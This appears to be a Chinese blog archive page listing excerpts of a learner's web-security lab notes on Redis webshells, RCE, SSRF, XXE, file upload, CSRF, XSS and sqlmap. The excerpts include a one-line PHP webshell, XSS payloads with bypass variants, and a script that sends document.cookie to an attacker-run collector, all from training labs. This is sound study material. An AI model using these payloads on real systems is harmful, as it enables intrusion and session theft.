08 2023 档案
centos里phpstudy报错
摘要:出现Address already in use: AH00072: make_sock: could not bind to address [::]:8报错,说明80端口被占用 可以寻找到80端口使用的程序并关闭。 但是我当时查看线程和端口的时候没有找到。这台虚拟机之前安装过apache,所以s
阅读全文
redis--webshell提权
摘要:实验很简单,但是实验过程中出现了很多问题 redis连接问题。 redis第一次登录成功,但是第二次就连接不上了。 解决方法:在服务端执行iptables -F 在客户端存储键值,更改存储路径和存储文件,将存储路径修改成网站默认目录。写入一句话木马。 使用蚁剑进行连接
阅读全文
远程代码执行漏洞
摘要:远程代码执行:Remote Code Execute 同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。 不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。 因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行
阅读全文
SSRF内容
摘要:SSRF(Server-Side Request Forgery) 服务器端请求伪造 在服务器上的文件发起的请求访问本机或其他机器上的文件 攻击者构造形成由服务端发起请求的安全漏洞 相关函数 curl_exec 可以执行cURL会话,返回网站代码 用途:爬虫、获取接口数据、FTP下载文件 使用时需要
阅读全文
XXE漏洞
摘要:XXE漏洞 xml external entity injection外部实体注入 $xml = simplexml_load_string($data);//运行xml语句 危害: 可以读取磁盘上的文件 <?xml version="1.0" encoding="utf-8"?><!doctype
阅读全文
XXE防范
摘要:1、在php、java代码中xml代码前加入禁用实体解析的代码 php: libxml_ disable_ entity. loader (true); ¥xml=simplexml_load_string($xmlContent); java: DocumentBuilderFactory dbf
阅读全文
XXE漏洞--xml基础知识
摘要:一、XML基础知识 可以用于配置文件、交换数据 要求: XML文档必须有根元素 XML文档必须有关闭标签 XML标签对大小写敏感 XML元素必须被正确嵌套 XML属性必须加引号 DTD(Document Type Definition) 文档类型定义 自动校验格式内容,元素ELEMENT校验 实体E
阅读全文
漏洞学习的思路
摘要:1、漏洞的发生原因是什么?定义是什么?2、怎么确定是否存在这个漏洞?怎么发现这种漏洞?3、漏洞会造成什么危害?4、如何防御和修复这种漏洞?5、有防御措施的情况下,怎么绕过这种漏洞?
阅读全文
文件上传漏洞的利用流程与防御
摘要:1、找到上传位置(寻找到源码可以通过upload等名字辨别) 如果没有上传位置 (1)、可以利用Redis持久化+未授权访问漏洞 (2)、使用mysql 读写 select into file(补充) 2、尝试绕过校验,上传文件 一些绕过方式:删除/禁用js、修改MIME、等价扩展名、大小写、hta
阅读全文
apache+php配置
摘要:apache配置 php配置 php.ini-development复制一份改名为php.ini 修改php.ini文件(php应该下载的不是这个nts文件,应该是没有nts的) 设置系统变量 apache,启动!
阅读全文
文件上传漏洞
摘要:webshell 一句话木马 eval($_POST['muma']); system函数可以执行操作系统的命令 代码短,只有一行代码。 场景多,可以单独生成文件,也可以插入到图片中。 安全性高,隐藏性强,可变形免杀 小马 体积小,功能少,只有文件上传功能,为大马做铺垫。 大马 体积大,功能全,能够
阅读全文
CSRF漏洞挖掘
摘要:csrf漏洞出现的原因: 网站接口被第三方网站调用时cookie被直接利用了 如何确定一个网站是否具有csrf漏洞 第三方网站调用敏感接口成功,则具有漏洞。 如何操作 BP可以对某些接口进行cdrf漏洞检测 可以生成一个html文件->poc,在浏览器中访问就可以确定是否包含 CSRF Tester
阅读全文
xss防御
摘要:测试payload: <script>alert('XSS')</script> <scriipt>alert(document.cookie)</script> ><scriipt>alert(document.cookie)</script> ='><scriipt>alert(document
阅读全文
xss检测和利用
摘要:XSSER 利用xsser检测dvwa平台,因为dvwa需要登录后使用,所以必须加上cookie 检测:xsser -u "http://192.168.221.1//dvwa/vulnerabilities" -g "xss_r/?name=1" --cookie = "security=low;
阅读全文
xss--xss平台搭建
摘要:pikachu get型xss 1、xss平台需要先修改配置文件 2、payload:<script>document.location='http://192.168.221.135(xss平台的ip地址)/pikachu/pkxss/xcookie/cookie.php?cookie='+doc
阅读全文
xss--dvwa靶场
摘要:xss reflected low payload:<script>alert('xxx')</script> medium 防御措施:使用str_replace函数替换了所有的<script> 绕过: str_replace对大小写并不敏感,或者双写绕过 payload:<Script>alert
阅读全文
Sqlmap的使用
摘要:1、get型提交 sqlmap.py -u +网址 sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 参数level level的等级越高,测试的等级越广,>=2时会检查cookie里的参数 >=3时检查user-agent和refereer --dbs
阅读全文